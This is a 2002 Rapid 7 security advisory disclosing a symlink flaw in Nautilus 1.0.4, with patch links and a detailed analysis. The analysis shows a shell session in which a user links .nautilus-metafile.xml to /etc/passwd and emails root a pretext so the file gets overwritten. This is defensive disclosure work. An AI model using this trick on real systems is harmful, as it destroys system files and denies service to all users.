R7-0003: Nautilus Symlink Vulnerability

[ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the
signature. See attached file for signed version.]

                Rapid 7, Inc. Security Advisory

       Visit http://www.rapid7.com/ to download NeXpose(tm), our
       advanced vulnerability scanner. Linux and Windows 2000
       versions are available now!

Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability

 Published:  05/02/2002
 Revision:   1.0
 CVE ID:     CAN-2002-0157
 Bugtraq ID: 4373

1. Affected system(s):

   KNOWN VULNERABLE:
   o Nautilus 1.0.4

   Apparently NOT VULNERABLE:

2. Summary

   Nautilus is a graphical shell for GNOME. It contains a
   vulnerability
   which would allow a malicious user to mount a symlink attack to
   overwrite
   another user's files.

3. Vendor status and information

   Nautilus
   Eazel, Inc.
   http://nautilus.eazel.com/

   The Nautilus team was notified on 03/26/2002.

4. Solution

   Upgrade to the latest version of Nautilus, available at
   http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate
   patch:

   RedHat 7.2:

   SRPMS:
   ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm

   i386:
   ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
   ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
   ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm

   ia64:
   ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
   ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm

   Slackware:

ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/

5. Detailed analysis

   When copying files from one directory to another, Nautilus creates
   small (88+ bytes) XML file called '.nautilus-metafile.xml' in the
   target
   directory. It does not check if a symlink with the same name
   already
   exists there, and blindly writes XML data to it. The following
   example
   shows how to cause a system-wide denial of service attack with this
   vulnerability:

   [jdog@imisshogs jdog]$ pwd
   /home/jdog
   [jdog@imisshogs jdog]$ cat /etc/passwd
   root:x:0:0:root:/root:/bin/bash
   bin:x:1:1:bin:/bin:/sbin/nologin
   daemon:x:2:2:daemon:/sbin:/sbin/nologin
   adm:x:3:4:adm:/var/adm:/sbin/nologin
   lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
   […snip…]
   jdog:x:500:500::/home/jdog:/bin/bash
   [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
   [jdog@imisshogs jdog]$ mail root
   Subject: Yo.
   Could you please copy "creepy-in-new-york.doc" to my home
   directory
   (/home/jdog)? Thanks.

     - Joe
   

   Cc:
   [jdog@imisshogs jdog]$ sleep 86400
   [jdog@imisshogs jdog]$ ls -l *.doc
   -rw-r–r-- 1 root root 13 Mar 24 18:09
   creepy-in-new-york.doc
   [jdog@imisshogs jdog]$ cat /etc/passwd
   <?xml version="1.0"?>
   <directory>
   <file name="creepy-in-new-york.doc" icon_position="55,105"/>
   </directory>
   [jdog@imisshogs jdog]$

6. Contact Information

    Rapid 7 Security Advisories
    Email:   [email protected]
    Web:     http://www.rapid7.com/
    Phone:   +1 (212) 558-8700
   

7. Disclaimer and Copyright

   Rapid 7, Inc. is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES
   with regard to this information. Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk. This information is subject to change without notice.

   This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
   hereby granted to redistribute this advisory in electronic media
   only, providing that no changes are made and that the copyright
   notices and disclaimers remain intact. This advisory may not be
   printed or distributed in non-electronic media without the
   express written permission of Rapid 7, Inc.